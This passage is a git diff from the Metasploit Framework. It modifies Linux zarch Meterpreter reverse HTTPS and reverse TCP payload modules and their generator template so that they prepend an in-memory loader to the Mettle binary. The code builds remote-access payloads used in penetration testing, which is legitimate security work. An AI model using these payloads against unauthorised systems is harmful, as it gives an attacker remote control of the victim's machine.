initialize(info = {}) super( @@ -31,11 +32,12 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'https', stageless: true }.merge(mettle_logging_config) - MetasploitPayloads::Mettle.new('s390x-linux-musl', generate_config(opts)).to_binary :exec + payload = MetasploitPayloads::Mettle.new('s390x-linux-musl', generate_config(opts)).to_binary :exec + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb index 6305aa40ca..570b13eef6 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb @@ -3,6 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## + # Module generated by tools/modules/generate_mettle_payloads.rb module MetasploitModule CachedSize = 1332048 @@ -16,28 +17,28 @@ module MetasploitModule super( update_info( info, - 'Name' => 'Linux Meterpreter, Reverse TCP Inline', - 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', - 'Author' => [ + 'Name' => 'Linux Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ 'Adam Cammack ', 'Brent Cook ', 'timwr' ], - 'Platform' => 'linux', - 'Arch' => ARCH_ZARCH, - 'License' => MSF_LICENSE, - 'Handler' => Msf::Handler::ReverseTcp, - 'Session' => Msf::Sessions::Meterpreter_zarch_Linux + 'Platform' => 'linux', + 'Arch' => ARCH_ZARCH, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseTcp, + 'Session' => Msf::Sessions::Meterpreter_zarch_Linux ) ) end - def generate(_opts = {}) + def generate opts = { scheme: 'tcp', stageless: true }.merge(mettle_logging_config) payload = MetasploitPayloads::Mettle.new('s390x-linux-musl', generate_config(opts)).to_binary :exec - in_memory_loader(payload) + payload + in_memory_load(payload) + payload end end diff --git a/tools/modules/meterpreter_reverse.erb b/tools/modules/meterpreter_reverse.erb index 8e012f795f..975ee14ce8 100644 --- a/tools/modules/meterpreter_reverse.erb +++ b/tools/modules/meterpreter_reverse.erb @@ -10,6 +10,7 @@ module MetasploitModule include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions::<%= platform.split('_').each { |s| s.casecmp?('osx') ? 'OSX' : s.capitalize! }.join %> include Msf::Sessions::MettleConfig + <% if platform.downcase == 'linux' %>include Msf::Payload::Linux::<%= arch.capitalize %>::MeterpreterLoader<% end %> def initialize(info = {}) super( @@ -36,6 +37,7 @@ module MetasploitModule scheme: '<%= scheme %>', stageless: true }.merge(mettle_logging_config) - MetasploitPayloads::Mettle.new('<%= payload %>', generate_config(opts)).to_binary :exec + payload = MetasploitPayloads::Mettle.new('<%= payload %>', generate_config(opts)).to_binary :exec + <% if platform.downcase == 'linux' %>in_memory_load(payload) + <% end %>payload end end